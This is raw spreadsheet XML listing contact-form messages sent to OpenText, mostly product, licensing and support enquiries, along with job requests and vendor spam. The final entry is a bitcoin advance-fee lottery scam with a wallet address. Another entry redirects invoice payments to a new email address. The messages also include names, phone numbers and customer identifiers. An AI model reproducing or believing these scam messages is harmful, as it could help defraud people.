The requirement is to extract many word documents from SAP system and store it in a PDF format without losing the embedded documents inside each word document._x000D_
_x000D_
Please feel free to call me on the above number.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Good day!_x000D_
_x000D_
I have not received your reponse after my first email to you, _x000D_
_x000D_
please allow me to introduce myself I am kuznatsova marina sales manger M-konstruktor Co., LTD. _x000D_
_x000D_
we have been in business for over 20 years on Infrastructural project development, _x000D_
_x000D_
construction machines,steel moulds,concrete equipment etc we have_x000D_
_x000D_
a huge project in Germany and we want to meet up with demands_x000D_
_x000D_
Patherning to this projects. So kindly offer us suitable model with your best full price catalogue for _x000D_
our review._x000D_
_x000D_
I am looking forward to hearing from you soonnest and hope to a further successful business _x000D_
relationship._x000D_
_x000D_
We believe that we will have the first business soon._x000D_
_x000D_
kuznatsova marina_x000D_
_x000D_
Sales Manager_x000D_
_x000D_
USA, 15 Novoseleninskaya,_x000D_
_x000D_
Velikiye Luki, Pskov oblast_x000D_
_x000D_
+1 (81153) 69-190-05885_x000D_
_x000D_
+1 (81153) 69-296-96456_x000D_
_x000D_
sales3@m-konstruktor.tk_x000D_
</t>
  </si>
  <si>
    <t>We'd like to know the cost for RightFax Business Server. To be installed on-prem.</t>
  </si>
  <si>
    <t>I want to check-out OpenText TeamSite. We need to implement for one of our clients &amp; want to develop a demo to test our capabilities. _x000D_
_x000D_
How do I get hands-on on the development environment?</t>
  </si>
  <si>
    <t>Hi, can you please let me know where I can get a copy of the latest version of Alchemy Search?  We need an updated version to view our invoices.  Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
I was wondering if you guys have any swag like t-shirt or sticker that you could send me, if so i would like to put them on &amp; showoff some support._x000D_
_x000D_
Looking forward to hearing from you._x000D_
___x000D_
_x000D_
Thanks &amp; have a nice day._x000D_
Amit :)</t>
  </si>
  <si>
    <t>We have SAP Invoice Management by Open Text 16.3. How can I access Open Text MySupport documentation</t>
  </si>
  <si>
    <t xml:space="preserve">You Like To Have Knowledge To Convert Oracle Forms TO ADF And integration's by Oracle Cloud Finance Like And Payroll Cloud ......   </t>
  </si>
  <si>
    <t>fgeghbtrneadb</t>
  </si>
  <si>
    <t xml:space="preserve">We currently require a link to download TD 6.3 lastest SP 5 download for win 32 </t>
  </si>
  <si>
    <t>Guys, we can't download purchased SW, Exceed and SSH. _x000D_
End User Company: 10470832 - Schlumberger Logelco Inc_x000D_
Reseller/Distributor Company: 10114375 - Niltasoft Limited_x000D_
Sales Order Number: 35657_x000D_
Delivery Number: 8000025016_x000D_
System Unique ID (SUID): 38531-12667_x000D_
Could you help please.</t>
  </si>
  <si>
    <t xml:space="preserve">Faxpress issue to discuss. We are unable to send or receive faxes using Faxpress solution so like to speak to someone who can give us a proper guidance. Also i know the software and the server platform we are using is very old so like to discuss the future plan to get proper fax solution. </t>
  </si>
  <si>
    <t>OpenText  consultant at Hadassah</t>
  </si>
  <si>
    <t>Need to download the Mobile Driver Pack</t>
  </si>
  <si>
    <t>Inquiry for Internship</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We’re IT leads provider from Noida, India. If you are looking for Web Design, Development or SEO leads kindly get back to us and we will charge as mentioned below. _x000D_
_x000D_
Web Development $10 Per Lead_x000D_
Web Designing $10 Per Lead_x000D_
SEO $8 Per Lead_x000D_
_x000D_
Regards_x000D_
Akansha_x000D_
Email: info@eacpl.net_x000D_
WhatsAPP: +91 8130017380       </t>
  </si>
  <si>
    <t>I met OpenText team at ADIPEC 2018 in Abu Dhabi._x000D_
We would like to deploy you knowledge management and automation solutions to a few companies here in the UAE. Please show us a demo of your products/solutions, to take the conversation forward._x000D_
Regards,_x000D_
Devashish.</t>
  </si>
  <si>
    <t>Subcribe</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(499) 322-46-85 когда дозвонитесь нажмите 2, спросите Александра.</t>
  </si>
  <si>
    <t>i can't acces the file that are encrypted with IRM Client</t>
  </si>
  <si>
    <t>We have purchased 4 new EnCase dongles.  We have been told that they are licensed for both EnCase 8 and 6.  Can we please have the certificates sent for these dongles?  They are listed below.  Please note that I attempted to log a request via the account portal however the process constantly crashed out and I was unable to complete the request._x000D_
_x000D_
G3002093298_x000D_
G3002093299_x000D_
G3002093300_x000D_
G3002093301_x000D_
_x000D_
Please let me know if you require additional details_x000D_
_x000D_
Regards,_x000D_
_x000D_
Adam Stenson</t>
  </si>
  <si>
    <t>chris strassburg is no longer here, did the renewal go to him?  I can't access support and I am assuming we our out of contract?  Please let me know how much the renewal is?</t>
  </si>
  <si>
    <t>I need to setup a new account for my client and transfer phone numbers from another account already using Fax2Mail</t>
  </si>
  <si>
    <t>Hi,_x000D_
My name Andrew from Washington D.C, I am interested in your E-discovery solution for Legal Industry. Can you send more information about your technology or possibly schedule a time for demo so I can see how the interface is._x000D_
_x000D_
_x000D_
Best,_x000D_
_x000D_
_x000D_
Andrew</t>
  </si>
  <si>
    <t>I need access to the Stage Stores Portal in order to enter items into the catalog. Please Help._x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of merging with a new bank names Vantage Bank Texas.  With this change, our domain name will be changing.  We will be having new email addresses across our new merged bank.  What do I need to do to allow fax2mail to email the faxes to the new email addresses?  Do I need to register our new domain with fax2mail?_x000D_
_x000D_
Thanks,_x000D_
</t>
  </si>
  <si>
    <t>Hi...I am seeking information on our Technology Partner Program.  There are 2 vendors in our space developing utilities that OT Perceptiv can take part in that extend the services available to our clients.</t>
  </si>
  <si>
    <t xml:space="preserve">Request a demo - Enterprise Content Management. </t>
  </si>
  <si>
    <t>I am having an issue when I login into OpenText Active Catalogue_x000D_
_x000D_
It doesnt give an error it just stays on the login page. _x000D_
Please help.</t>
  </si>
  <si>
    <t>When login in to your site, I'm not able to submit a question._x000D_
I have Open Text Socks Client ver. 14.0.0 and runs Windows 10:_x000D_
How do I download SP13 for Open Text Socks Client ver. 14.0.0 ?????_x000D_
When Installing Text Socks Client ver. 14.0.0 ...FireFOX and other apps stops working even if Open Text Cleint is not started</t>
  </si>
  <si>
    <t>Researching companies to provide platform/development/and implementation of an electronic document management system that controls document versions, change controls, exceptions, and training.</t>
  </si>
  <si>
    <t>Please contact me to schedule a demonstration of 'Documentum' as our potential electronic Document Management Systems in our company? Thank you!</t>
  </si>
  <si>
    <t>Pre-sales questions for a customer.  Looking to replace our on-prem fax solution with a cloud-based solution.</t>
  </si>
  <si>
    <t>Topic: Opentext Recruitment Process / issue_x000D_
attn: Opentext Recruitment_x000D_
_x000D_
Dear OpenText Associate,_x000D_
kind forward this message to the attention of your recruitment management. October 17th I submitted an application for the job opening #20878 account executive enterprise software. Whilst I used to collaborate regularly with Opentext colleagues during my time at SAP, I had expected to make an experience with your recruitment proces. But unfortunately you digital recruitment proces does not provide an applicant any acknowledgement of receipt nor a word on how the proces will proceed. The website doesn't even provide the option to contact OpenText Recruitment for further inquiry. _x000D_
Early November, two weeks after submission, my Linkedin Profile was looked up by the country manager and another key account manager. And that was it. _x000D_
Please be so kind to delete my CV profile from your database. _x000D_
Thank you and regards,_x000D_
Ronald</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext,_x000D_
_x000D_
We need get more information about your solution BPMS and your cloud service like : price, number of user, cloud type (SaaS, PaaS) hybrid, multiplatform, succes case in Québec,  partners integrators and etc_x000D_
We work to elaborate the RFI to our client (public sector)._x000D_
_x000D_
Could you send me the information ? In french will be appreciate._x000D_
If you prefer to talk about it, in french it will be more profitable._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ricardo Tannure_x000D_
</t>
  </si>
  <si>
    <t>I need to get the latest Encase software. I have no idea how to now on this site. I just registered but need to access more. I have a EnCase dongle ID of V1256854225.</t>
  </si>
  <si>
    <t>customer uses Office365 Premium and Public Folders for storing emails relating to current and past orders.  Public Folders is very slow to access and move emails so they are looking for a different way to keep emails shared relating to orders</t>
  </si>
  <si>
    <t>In partnership with the Ontario Trillium Foundation, we are conducting research on the impact of inclusive business practices on the well-being communities in Ontario. Recognizing the inclusion of Open Tex on Canada’s Top 100 Employers list, we would be interested in speaking with someone regarding Open Text's internal business practices that create social value. If you could kindly connect us with the appropriate contact within Open Text who could provide insight on this question, that would be greatly appreciated. Thanks in advance for your consideration of our request.</t>
  </si>
  <si>
    <t>Not able to view tickets or open the tickets in the OTMM customer support page. Showing error as "We're sorry, your account does not grant you access to this resource."</t>
  </si>
  <si>
    <t>Right fax delivers blurred copies even with adjustments.  The most current situation has a busy signal and return message reads (network high and dry) - example below:_x000D_
_x000D_
11/19/2018 3:35:49 PM Transmission Record_x000D_
	Sent to 14049465370 with remote ID "14049465370"_x000D_
	Result: (3933) Special Information Tone - Network high and dry (no ring)_x000D_
	Page record: NONE SENT_x000D_
	Elapsed time: 00:00 on channel 30_x000D_
Please help me as soon as possible</t>
  </si>
  <si>
    <t>Hi support. we have received  an email regarding the renewal of our EnCase software on the 30th October.  I currently do not have any access to download a license file. what do I need to do to get this resolved?_x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
Chuck</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I've downloaded a demo of OpenText information hub, and we need a trial login, we are comparing this to prior Alchemy 9.0 for possible upgrade. Thanks </t>
  </si>
  <si>
    <t>Integration Partnership.</t>
  </si>
  <si>
    <t>Working with a customer that needs eDiscovery for storage reduction and GDPR compliance.  I need to understand how your product is priced and delivered.</t>
  </si>
  <si>
    <t>Wir brauchen bitte ein Angebot für Unterstützung im Bereich OpenText OS Upgrade von OpenText Archiving and Document Access for SAP Solutions 10.5 derzeit auf Windows 2012 – Releasewechsel auf Windows 2016.</t>
  </si>
  <si>
    <t>Hi, we're a customer (username 8664005496). In the past we ported several analog fax numbers into our account. I have 2 additional numbers I would like to port in, is this service still available? Thank you!</t>
  </si>
  <si>
    <t>Need to update EnCase dongle please advise.  Thank you</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir beabsichtigen die EInführung eines DMS. Insbesondere die Abwicklung eines Rechnungseingangsworkflows sowie eine Anbindung an unser Inhouse-ERP-System und die Buchhaltung (Sage 100) sind vorstellbar._x000D_
_x000D_
Bitte nehmen Sie diesbezüglich mit uns Kontakt auf._x000D_
_x000D_
Vielen Dank._x000D_
_x000D_
MfG_x000D_
_x000D_
Michael Zimmer</t>
  </si>
  <si>
    <t>Hi!_x000D_
I am trying to move a dokustar license from an old Agresso server to a new one. I need a OTCS ticket to fill out the License request form. The customer is Oljedirektoratet in Norway._x000D_
_x000D_
Best regards_x000D_
Fredrik Skjåk-Bræk</t>
  </si>
  <si>
    <t>Здравствуйте, могу для вашего вэбсайта создать и продвинуть страничку соц.сети ВК.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm with a reseller in New Hampshire.  One of our government customers is requesting a renewal quote.  Could I get pricing?_x000D_
_x000D_
OPEN TEXT_x000D_
S-EXMPI555101M_x000D_
Exceed 3D Single maintenance_x000D_
System ID 71045-12289,_x000D_
Master 10300386_x000D_
EU0010091 - Newport News Shipbuilding_x000D_
Qty: 1_x000D_
POP: 1/01/2019-12/31/2019_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Cause I keep getting this gmail wen I’m not Approved for it but yall won’t me to keep signing up </t>
  </si>
  <si>
    <t>We are current customers of Open Text BPM and need to upgrade.  Looking for my account representative to setup meetings to evaluate the newest version of MBPM.</t>
  </si>
  <si>
    <t>Hallo, mein Kunde die Hensoldt Sensors führ aktuell eine Ausschreibung durch. Bestandteil davon ist der Support (2nd, 3rd) für die bereits vorliegende: Fax-Server Rightfax Windows (V-Center) Installation._x000D_
Bitte erstellen Sie uns ein Angebot hierzu für die Dauer von 36 Monaten._x000D_
Danke vorab_x000D_
Freundliche Grüße_x000D_
Reinhold Hammerschmidt</t>
  </si>
  <si>
    <t>Hi _x000D_
I have an opentext account but need I have forgot my password._x000D_
I have clicked the "Forgot password" link ._x000D_
when I submit the new, strong, password I get "update password failed"_x000D_
Please help me_x000D_
Regards_x000D_
Ulf Svernby</t>
  </si>
  <si>
    <t xml:space="preserve">HI we have a problem with the Native Setup installation on a IE, the problem is, whem the addin is allready instaled, the system give me, the install again. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for job change, my key skills are sales/marketing, relationship manger, presales, direct sales, channel sales ect </t>
  </si>
  <si>
    <t>Hello_x000D_
I have purchased recently an update for EnCase Forensic. In my acount the product is not shown and i cannot activate the licence._x000D_
Dongle ID is: G2002082274_x000D_
Best Regards,_x000D_
CETASC Team</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or Madam,_x000D_
InteliMaster is a company which carries out employment reference checks. We are contacting you on behalf of Sterling Talent Solutions._x000D_
We would like to confirm information provided to us by a candidate, Bhat, Rahul, who is applying for a new job and has worked at your Institution. _x000D_
We've tried to reach per phone and e-mail, but there is no answer yet. We will be grateful if you can advise us how to proceed with that._x000D_
_x000D_
Looking forward to your answer,_x000D_
Yana Obreshkova_x000D_
InteliMasters ltd_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide installer for latest EnCase8 version. We have dongles G2002073965 and G2002073960. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have requirement of below software , please provide the price for the same._x000D_
_x000D_
Encase V 8.0 or Latest Version with 01 Year Warranty -Renewal for 01 Years Customer ID : G3002090301 </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Lacking behind in Google Ranking? We give you durable top-notch SEO services, only @ $99/Month._x000D_
 _x000D_
We also provide web design starting @ $299_x000D_
 _x000D_
Please specify your requirement for details._x000D_
_x000D_
Thanks_x000D_
Bhawana Singh | Whatsapp: +91 9212464161</t>
  </si>
  <si>
    <t>Trial programme requested for 30 days at no cost?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We are a professional services group headquartered in Mumbai, India. I am part of the Forensic services group here at SKP overlooking technical solutions/infrastructure related to digital forensics and eDiscovery. As part of our services, we provide eDiscovery solution and services including review and administration to a large number of law firms and corporate houses for their ongoing/impending investigations. _x000D_
_x000D_
We are interested in having a solution for our own project executions as well as client needs/recommendation (if partnership model is available in this region). Currently we are using Relativity and other hosted eDiscovery platforms and are exploring possibilities of acquiring/subscribing to a more robust solution mainly for Processing, Review and Production._x000D_
 _x000D_
Our main objective here is to learn more about opentext’s eDiscovery products and services._x000D_
_x000D_
We are looking at the following focus points :- _x000D_
 _x000D_
•	Upload Time ( If hosted service is available )_x000D_
•	Processing capabilities (Onsite/Hosted- if available)_x000D_
•	Production turnaround:  ~ 24 Hours_x000D_
_x000D_
Would it be possible to schedule a demo of the product possibly later next week? _x000D_
</t>
  </si>
  <si>
    <t>We are working with one of our client who has a licensed version of Teamsite 8.2. They are in need of some enhancements on the WCMS components and asking for help in developing the same. I would like to know the license cost of Teamsite 8.2. This will be used only to develop certain functionalities and deploy the same in the licensed version that our client has. Kindly let me know the feasibility of such license option for up to 5 developers. If licensing is possible, please share the details of one-time licence or time-bound license, etc. Please reply over email.</t>
  </si>
  <si>
    <t>Tochigi</t>
  </si>
  <si>
    <t>Dear opentext,_x000D_
_x000D_
We are looking for a CRM System that is able to handle our Price Inquiries (Price Check) and Price Complaints. _x000D_
Price Inquiries (Price Check) raised by Customers can include 100+ Parts per Request in one email._x000D_
Those existing &amp; validated prices have to be fetched from our D2S SAP System. Automated email response via Outlook._x000D_
It is also possible, that prices are not set and therefore a notification to the responsible employee has to be send._x000D_
Price Complaints have to be inserted in a standardized form. Those complaints currently are very individual. Therefore this has to be discussed in a later stage._x000D_
_x000D_
Our Business Structure has 3-4 logistic levels with 3 different roles._x000D_
We have around 350 possible Users (Customers) from 50 Warehouses._x000D_
_x000D_
Price Inquiries are 90% of the total volume. Price Complaints are 10% of the total volume._x000D_
There are 400 to 700 Price Inquiry emails per month._x000D_
_x000D_
We do require Japanese &amp; English language interface._x000D_
Please do not hesitate to contact me if you need further details._x000D_
_x000D_
_x000D_
Kind Regards</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Item No._x000D_
_x000D_
Description _x000D_
_x000D_
Qty_x000D_
_x000D_
Unit_x000D_
_x000D_
End User:  Criminal Justice Investigation Services_x000D_
Buy #957366_x000D_
_x000D_
001  Exceed PowerSuite Single License (electronic) maintenance S-EXMPI5560101M_M) MAINT-EXMPI556700M-3 100 EA _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get quote on EnCase Endpoint Investigator.  We currently have EnCase Basic and are listed under company name CRIF and dongle# X100008005307.  Company has been acquired and name on quote should now be Meridian Link. </t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText team,_x000D_
_x000D_
I hope this mail find you very well. My name is Lady Moreno, consultant at A.T. Kearney, a leading management consulting firm with presence in more than 40 countries._x000D_
_x000D_
Currently, we are carrying out a Digital Transformation project for one of the largest banks in Latin America and the Caribbean. In this context, our client is highly interested in incorporating the Enterprise Content Management (ECM) solution your company offer. _x000D_
_x000D_
We would like to have a call with you to understand the following topics: _x000D_
_x000D_
- General description of the solution and detail of its features_x000D_
- Provisioning model (cloud, on-premise, etc.)_x000D_
- Economic and licensing model (per user, per volume, annual recurring, etc.)_x000D_
- Investment required (CAPEX) and/or monthly/annual cost (OPEX) _x000D_
- Estimated implementation time _x000D_
- Additional implementation requirements (integrators, products, etc.)_x000D_
_x000D_
This preliminary inquiry is part of the research for partners that will support the transformation process of the company in the future. In this sense, for our client it is a priority to have this information in the shortest time._x000D_
_x000D_
We are at your entire disposition to clarify any concerns. Thank you in advance for your help, and we look forward to hear from you soon. _x000D_
_x000D_
Best regards, _x000D_
_x000D_
Lady Moreno_x000D_
_x000D_
A.T. Kearney, S.A.S_x000D_
Carrera 7 No 73-55, Piso 14_x000D_
Bogotá, Colombia_x000D_
+57 1 316 4010 </t>
  </si>
  <si>
    <t>We are interested in OpenText Right Fax on premises solution.  We are working up budget numbers for next year and would like to get a quote.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to update OpenText password via reset link sent._x000D_
"An error occurred updating password"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I would like to introduce myself and Alexis Exhibits as a prospective partner to assist you with the HIMSS Feb 11 - 15, 2019. Alexis Exhibits is a full service exhibit house that specializes in custom designs, manufacturing and asset management. Alexis turnkey relationships allow us to assist with event planning and create design solutions with effective returns on investment. Contact me for a no obligation design and estimate. If you are set for HIMSS please keep us on file for participating in your next RFP. Looking forward to discussing how Alexis Exhibits can start working for you._x000D_
_x000D_
Kind regards, _x000D_
_x000D_
Tom_x000D_
_x000D_
Thomas Sabol » Account Executive_x000D_
Office: 440.324.1037 x222 _x000D_
825 Leona St | Elyria, OH 44035_x000D_
</t>
  </si>
  <si>
    <t>Interest in referral and/or partner program</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8(952)096-44-78 Виктор</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText Content Server Business Consultant Certification v16.2 _x000D_
Hello,_x000D_
Getting in contact for our consultants in regards to the Certification Test. When the test is taken online how does the process go once we register to take it? Is there a specific amount of time before we can take the exam or can it be taken immediately after registering?_x000D_
_x000D_
_x000D_
Regards,_x000D_
Kayla Hauptmann_x000D_
</t>
  </si>
  <si>
    <t>My account cannot be confirmed._x000D_
I need to update my corporate account number.</t>
  </si>
  <si>
    <t>We had subscribed for EDI services from Opentext. We want more licenses. Please wrote back or call me. Kelli Lowry was the point of contact</t>
  </si>
  <si>
    <t>Registration Server Error_x000D_
While trying to log in I created my password and then I got a Server Error</t>
  </si>
  <si>
    <t>A client of ours received an invoice for annual renewal of Brava Prime Protect - FYM, Core Prime Protect Loyalty, and Brava! Desktop TIFF, PDF, JPG, EPS/PS &amp; CSF only. View + Print only. CITRIX SKU (Single User) Maintenance (03/26/19 - 03/25/20) Unique# IGC371285 Unique Name: 371285._x000D_
_x000D_
Can you explain what this auto-renewal is for? _x000D_
_x000D_
Thanks! Response via email preferred.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in your OCR product. We are looking for open source and paid services for our OCR solution._x000D_
Can you provide me with more information on capabilities, pricing and details about your product ?_x000D_
_x000D_
Thank you,_x000D_
Shailesh</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
We are interested in learning about your ECM solution (with demo) and examining the potential of OpenText._x000D_
_x000D_
Regards,_x000D_
Reuel Kirpaul</t>
  </si>
  <si>
    <t xml:space="preserve">I ma already an Encase Endpoint Security customer. I saw the announcement of OpenText™ EnCase™ Advanced Detection. Can someone contact me about pricing?_x000D_
</t>
  </si>
  <si>
    <t>Request a quotation for Installation of Open Text Archiving &amp; Document Access for SAP</t>
  </si>
  <si>
    <t>My company utilizes a homegrown VDP solution that we have slowly but surely outgrown. We are in need of an enterprise level, out of the box, VDP solution that allows us to scale our work and our team appropriately. We have a custom base of around 750 Ambulatory Surgery Centers and Hospitals. Each of these facilities generates a printed document of varying page counts with a pretty substantial about of variable data landing on the pages, and all sourced from a database procedure. We need a solution that allows us to grow and shrink areas, tables, rows, etc. accordingly. _x000D_
_x000D_
My background is that of I used to work for DST Output and was one of the SME's of then HP Extsream (up to version 8, I believe) in my location. I contacted Rich Enright a few years ago about bring Exstream on-board, but at that point I do not believe we were in the financial position to look at enterprise level solutions based on the costs he floated. I think that our position has changed a bit, as we have grown pretty significantly. So, I wanted to reach out once again to see if it would finally be a good fit or to see what, if any, the new offerings would be. Looking forward to speaking with someone!_x000D_
_x000D_
Regards,_x000D_
Chris Belden</t>
  </si>
  <si>
    <t>I want to learn more about TeamSite and understand how the CMS works (e.g. is it a software?)._x000D_
_x000D_
Thanks,_x000D_
Dianne</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in Early Case Assessment by Recommind. Looking for a product that can perform searches and collection for responsive data from multiple sources including Workstations and File Servers (NAS). </t>
  </si>
  <si>
    <t xml:space="preserve">Issue with the sending out Fax. _x000D_
When we send out 20 pages fax - As per the fax press its looks like, its been sent - but on end user side - they only receive 5 pages instead of 20. _x000D_
Unable to work it out why? _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam_x000D_
I have been appointed by United Grand Lodge of England to set up an EDRMS for the organisation and I am inviting a number of suppliers, including your organisation, to demonstrate their product. If you would like to accept this invitation, please can you confirm whether any of the following dates would be convenient and we can discuss what time would be convenient. Please could you also state whether this would be a remote demo or whether you will be attending in person. We are based on Great Queen Street, London (WC2B 5AZ)._x000D_
If you would like any further information, please don’t hesitate to contact me._x000D_
_x000D_
Tuesday 27th November_x000D_
Thursday 29th November_x000D_
Friday 30th November_x000D_
Monday 3 December _x000D_
Tuesday 4th December _x000D_
Wednesday 5th December _x000D_
_x000D_
Yours sincerely_x000D_
Ellen Taylor_x000D_
</t>
  </si>
  <si>
    <t>HAVING PROBLEMS TO PROCESS PAYMENT BY CREDIT CARD ON THE WEBSITE PLATFORM.  THERE IS A BUG THAT SAYS:  ¨An unexpected error has occurred during processing._x000D_
Please contact the system administrator if the problem persists."</t>
  </si>
  <si>
    <t>I support Nexteer for eroom support.  I have not logged in since your moved to opentext.  I need to submit a ticket and can't get in.  would like to see how I can link nexteer to my account</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We would like to inform that we have detailed and verified contacts of Automation Industry Prospective Clients for your upcoming Design Automation Conference (DAC) 2019!_x000D_
_x000D_
Target Industry: Automotive engineering, Building automation &amp; HVAC, Design engineering, Electromechanical engineering, Chemical engineering &amp; processing Coal &amp; Mining, Electromechanical engineering, Offshore engineering, Mechanical &amp; materials handling, Plant &amp; Control engineering, Renewable energy, Packaging &amp; Converting, Pumps &amp; fans and many more….._x000D_
_x000D_
Target Audience:  Owners, Managers, Design Engineers, Process/Production and Manufacturing Engineers, Manufacturers' Representatives, QA/QC/Test Engineers, R&amp;D Personnel and Corporate Management, and much more from Large, Medium, and Small Sized Companies. Maintenance Engineer, Engineering Management, Engineer (general, environmental, process, plant)._x000D_
_x000D_
We can also assist you with the Attendees list for Design Automation Conference (DAC)._x000D_
_x000D_
I will truly appreciate if you could let us know your target audience in the below format so that I could get back to with the counts, data benefits, cost and samples for your review._x000D_
_x000D_
Target Industry        : _____________x000D_
Target Job title         : _____________x000D_
Target Geography    : _____________x000D_
_x000D_
Awaiting for your response. _x000D_
_x000D_
Best Regards,_x000D_
Sara Anderson_x000D_
Marketing Manager_x000D_
_x000D_
Note: If you do not wish to receive future emails from us, please reply as 'leave out'_x000D_
</t>
  </si>
  <si>
    <t>if there is any outstanding fees for the matter of Mitchell and Butler _x000D_
Customer ID is 10425017</t>
  </si>
  <si>
    <t>Hello,_x000D_
Our compliance &amp; audit &amp; finance department needs a document named “certificate of residence”. _x000D_
It is formal document obtained from the competent authorities of the country in which the person or company is a resident of the country, or the person or institution established in that country and a taxpayer. The validity certificate for a calendar year is valid until the fourth month of the following year._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>I have recently taken over primary support for our Right Fax solution._x000D_
We are now in need of both moving our RightFax PRI and re-ipping it at the same time._x000D_
I need to discuss with someone regarding steps needed to take for making both items successful with minimal impact to our users.</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Pourriez-vous m'envoyer votre étude sur l'intelligence artificielle et les français, si cela est possible_x000D_
Merci d'avance_x000D_
Cordialement</t>
  </si>
  <si>
    <t>What is the latest version for  OpenText Brava! for IBM Solutions?  Is version 16.02 Enterprise the latest version?</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
Please remit all invoices for InterMetro Industries account # us01-81343to imap@dataservondemand.com  for payment. All mailed invoices will be rejected.  If this does not pertain to you please forward to the correct AP person._x000D_
</t>
  </si>
  <si>
    <t>Job requirement purpose</t>
  </si>
  <si>
    <t xml:space="preserve">Hello .. i want to explore this .. could you please connect me with someone? </t>
  </si>
  <si>
    <t>what is the website address for the trading grid</t>
  </si>
  <si>
    <t>Looking for more of a support contact, I am new to this position with the Federal Government of Canada. _x000D_
_x000D_
We are running our "GCdocs" on OpenText and are in the process of making the upgrade to version 16 as far as I am aware. _x000D_
_x000D_
I was looking to inquire about the possibility of some basic scripting/automation. Is is possible to write scripts to create groups/folders apply rights etc...? _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Rob</t>
  </si>
  <si>
    <t>Interested to test this solution "OpenText™ Capture for Microsoft® SharePoint®" and get a quote to make an informative decision. Thanks</t>
  </si>
  <si>
    <t>I am looking to implement the new solution to accompany a company wide redesign of forms and workflows to digitally capture from Image the form content, along with OCR / ICR capabilities to produce "output files" with compressed images to be processed into our ERP Solutions.</t>
  </si>
  <si>
    <t>One of my customers is currently looking for a new CMS solution. I would like to get in touch to discuss Opentext and find out if there is a fit with their requirements. Preferably with one of your local offices in the Netherlands._x000D_
_x000D_
Thanks,_x000D_
Fouad</t>
  </si>
  <si>
    <t xml:space="preserve">we are from Standard Chartered Bank and in the process of evaluating the available vendors to sign a support agreement to support RightFax application installed at Standard Chartered Bank. Please be kind enough to share the approved/recommended  vendor list from Sri Lanka to proceed with this. </t>
  </si>
  <si>
    <t xml:space="preserve">I want to buy EXCEED v14 or v15_x000D_
But I am confused with product type._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings of peace._x000D_
Our program "Doctor sa Kahanginan" (doctor on the air) on live broadcast  hosted by Dr. Edward R. Cagape -Medical Surgeon on the University of Mindanao's " RADYO UKAY " AM radio station at 819 khz from  Monday to Friday 8:AM-9:AM  has been going on for several years serving free medical consultations live on the radio program  for locals and ofws and it can be also be viewed at Facebook live streaming._x000D_
_x000D_
DANAHER might be interested  to secure a sponsorship._x000D_
_x000D_
Thank you._x000D_
Respectfully,_x000D_
Edson Rabuyo Cagape_x000D_
(Marketing Manager)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
  _x000D_
I went through your website and we would love to_x000D_
  _x000D_
collabarte with your team on a project _x000D_
  </t>
  </si>
  <si>
    <t xml:space="preserve">Let me Know Openings on Manual Testing(Web Applications) </t>
  </si>
  <si>
    <t>Dear Open Text,_x000D_
_x000D_
we would like to inquire of the status of one of your subsidiary company namely Actuate Software of Shanghai, China._x000D_
_x000D_
HireRight has been appointed to verify information for the purposes of a pre-employment screening report and have been asked to confirm the employment history of your previous employee. We would like to inquire for direct phone number or email address for Actuate (Shanghai) Human Resources/Payroll Department where we can send the request form for reference. I would appreciate if you could send me the information as soon as possible._x000D_
 _x000D_
Cheers.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We wanted to give your employees at the Waterloo office a discount for our cleaning services._x000D_
Is there someone we could speak to about this? _x000D_
Thanks, Cara </t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
My name is Chandu, I’m a SAP Basis architect at Amgen. _x000D_
While looking for cloud solutions on archiving for SAP systems we have come across your product, would like to know more about your product, could we have a demo kind of meeting to show what your product does and how is it different from the other vendors like OpenText? what is the big advantage of your product over products by other archiving solution vendors?_x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello! You won $ 1950 today, I'm sure of that. _x000D_
 _x000D_
Because it is a bitcoin win-win lottery! _x000D_
 _x000D_
One cryptocurrency multimillionaire who wished to remain incognito organized it. _x000D_
 _x000D_
You just need to send 0.05 bitcoins to the specified wallet and within 3 hours 0.35 bitcoins will come to your wallet that equals $ 1950. _x000D_
 _x000D_
You can participate once a day. The lottery will be held until November 25, 2018. _x000D_
 _x000D_
Hurry up to get your $ 1950 for this day. Send 0.05 bitcoins to the selected wallet for your game: 1Q4tfBmpiNGGAtUc9Vo2Zo3Rsjs2KFb7AR</t>
